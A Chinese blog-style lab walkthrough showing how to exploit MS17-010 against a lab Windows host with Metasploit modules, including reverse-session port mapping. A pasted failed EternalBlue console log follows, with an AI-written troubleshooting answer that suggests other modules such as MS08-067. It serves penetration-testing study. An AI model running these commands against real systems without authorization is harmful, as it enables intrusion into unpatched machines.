MS17-010 实验

本文介绍了如何使用msfconsole工具针对ms17-010漏洞进行非反弹和反弹会话攻击。在非反弹方式中,通过auxiliary模块执行命令,而在反弹会话方式下,由于KaliLinux的NAT配置,需要设置端口映射以实现服务器到个人电脑的连接。涉及的步骤包括模块选择、参数配置以及端口映射操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

网络拓扑

image.png

启动msf
msfconsole

image.png

搜索ms17-010 漏洞模块
search ms17-010

image.png

不反弹会话方式 (不容易打崩)

使用 auxiliary/admin/smb/ms17_010_command 模块
可以直接使用命令:
use auxiliary/admin/smb/ms17_010_command

也可以使用如下方式:
查询出来该模块编号为2 ,可以直接使用命令:
use 2
image.png

查看该模块所需参数
show options
image.png

其中yes参数是必须项

图中 RHOST 项未配置参数

配置为 目标IP set RHOSTS 10.0.3.174

image.png

设置 想要执行的命名

set COMMAND whoami

image.png

执行命令 并返回 结果
exploit
image.png

反弹会话方式

观察实验拓扑图,服务器反弹会话过程,相当于 服务器访问kali的一个端口;但是kali虚拟机以NAT方式联网,服务器无法访问192地址,只能访问到个人电脑10.250.0.XX地址。

这里便需要做个端口映射
将kali的44444 端口映射 个人电脑的44444端口

image.png

端口映射过程

vm中 编辑中 虚拟网络编辑器
image.png

image.png
image.png

image.png

加载模块exploit/windows/smb/ms17_010_psexec
配置参数如下

image.png

msf6 exploit(windows/smb/ms17_010_eternalblue) > nmap -O 192.168.200.129 [*] exec: nmap -O 192.168.200.129 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 21:32 EDT Nmap scan report for 192.168.200.129 Host is up (0.00026s latency). Not shown: 992 closed tcp ports (reset) PORT STATE SERVICE 25/tcp open smtp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1433/tcp open ms-sql-s MAC Address: 00:0C:29:1B:D6:5A (VMware) Device type: general purpose Running: Microsoft Windows XP|2003 OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003 OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003 Network Distance: 1 hop OS detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 2.32 seconds msf6 exploit(windows/smb/ms17_010_eternalblue) > set rport 445 rport => 445 msf6 exploit(windows/smb/ms17_010_eternalblue) > run [*] Started reverse TCP handler on 192.168.200.208:4444 [*] 192.168.200.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.200.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit) [*] 192.168.200.129:445 - Scanned 1 of 1 hosts (100% complete) [+] 192.168.200.129:445 - The target is vulnerable. [-] 192.168.200.129:445 - Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets [*] Exploit completed, but no session was created.
最新发布
03-22
<think>好的,我现在需要帮助用户分析他们提供的渗透测试过程,并解释为什么攻击失败。首先,用户在使用Metasploit的永恒之蓝漏洞(ms17_010_eternalblue)进行攻击时遇到了问题,最终没有成功创建会话。让我逐步拆解整个过程,找出可能的原因。 首先,用户一开始在msf6的漏洞模块下执行了nmap -O 192.168.200.129。从nmap的结果来看,目标主机开放了多个端口,包括445(microsoft-ds),这通常是SMB服务使用的端口,而永恒之蓝漏洞正是利用SMB协议的。所以用户正确地将目标指向了这个端口。nmap的操作系统检测结果显示目标可能运行的是Windows XP SP2或Windows Server 2003,这些系统都是32位的。这一点很重要,因为后续的漏洞利用是否支持32位系统会直接影响结果。 接下来,用户设置了rport为445,这是正确的,因为SMB服务通常在此端口监听。然后执行run开始攻击。根据输出,Metasploit首先使用辅助模块scanner/smb/smb_ms17_010进行漏洞检查,确认目标存在漏洞。这里显示目标系统是Windows 5.1 x86,即32位的Windows XP或Server 2003。然而,问题出现在最后一步:模块报告“Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets”,说明该漏洞利用模块仅支持64位系统,而目标系统是32位的,因此攻击被中止。 现在需要确认几个关键点: 1. Metasploit的ms17_010_eternalblue模块是否确实不支持32位目标?查阅文档或模块信息,确认其目标架构。根据错误信息,模块仅支持x64,所以可能该模块设计时只针对64位系统,比如Windows 7或更高版本,而用户的目标是较旧的32位系统。 2. 是否存在针对32位系统的永恒之蓝漏洞利用模块?可能用户需要切换另一个模块,或者调整参数。例如,有些情况下可能需要手动设置目标类型,但该模块可能没有包含32位的目标配置。 3. 是否有其他模块可用?比如,检查是否有其他相关漏洞利用模块适用于32位系统。例如,可能使用另一个利用程序,或者同一个模块的不同设置。 此外,用户可能忽略了在设置漏洞利用时的目标选项。在Metasploit中,某些模块允许使用“show targets”命令查看支持的目标系统,然后使用“set target <编号>”来指定。但根据错误信息,模块本身可能不支持32位,因此即使尝试设置目标也可能无效。 解决方案可能包括: - 检查是否有更新版本的模块支持32位系统,或者寻找替代的利用模块。 - 如果目标确实是32位且无法更改,可能需要使用其他漏洞或方法进行攻击,例如使用不同的漏洞利用,或者结合其他攻击手法。 - 用户可能需要确认目标系统的确切版本,是否有可能误判。比如,虽然nmap检测为32位,是否有可能实际是64位?但根据输出中的OS CPE,显示的是Windows XP SP2或2003,这两个系统通常都是32位的。 总结问题根源:用户使用的Metasploit模块仅支持64位系统,而目标为32位,导致攻击失败。需要调整利用模块或选择其他适合32位系统的攻击途径。</think>以下是逐步分析与解决方案: 1. **漏洞检测阶段** - 使用`nmap -O`确认目标IP开放端口及操作系统: $$ \text{目标系统为Windows XP SP2或Server 2003(32位)} $$ - 关键端口`445/tcp`开放,符合永恒之蓝漏洞利用条件。 2. **漏洞验证阶段** - Metasploit的`smb_ms17_010`检测确认目标存在漏洞: $$ \text{主机状态:VULNERABLE} $$ - 但系统架构检测为`x86 (32-bit)`,与模块要求冲突。 3. **攻击失败原因** - 错误信息明确提示: $$ \text{This module only supports x64 (64-bit) targets} $$ - 当前模块`ms17_010_eternalblue`仅支持64位系统,无法攻击32位目标。 4. **解决方案** - **方案1:更换利用模块** - 查找支持32位系统的永恒之蓝利用模块。例如,某些旧版模块可能兼容,但需验证有效性。 - 在Metasploit中尝试以下命令: ```bash search eternalblue # 检查其他模块是否支持32位(例如 auxiliary/admin/smb/ms17_010_command) ``` - **方案2:手动指定目标参数(若模块支持)** - 使用`show targets`查看模块支持的目标列表: ```bash msf6 exploit(windows/smb/ms17_010_eternalblue) > show targets ``` - 若列表不含32位选项,则此路不通。 - **方案3:使用其他漏洞利用** - 针对Windows XP/2003的其他漏洞(如MS08-067): ```bash use exploit/windows/smb/ms08_067_netapi set RHOST 192.168.200.129 run ``` 5. **补充建议** - **验证目标架构准确性**: 使用`nmap -sV --script smb-os-discovery 192.168.200.129`进一步确认系统信息。 - **更新Metasploit框架**: 确保模块为最新版本,可能存在新增的32位支持。 **总结**:当前失败原因是模块与目标架构不匹配。需更换利用模块或调整目标系统选择。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值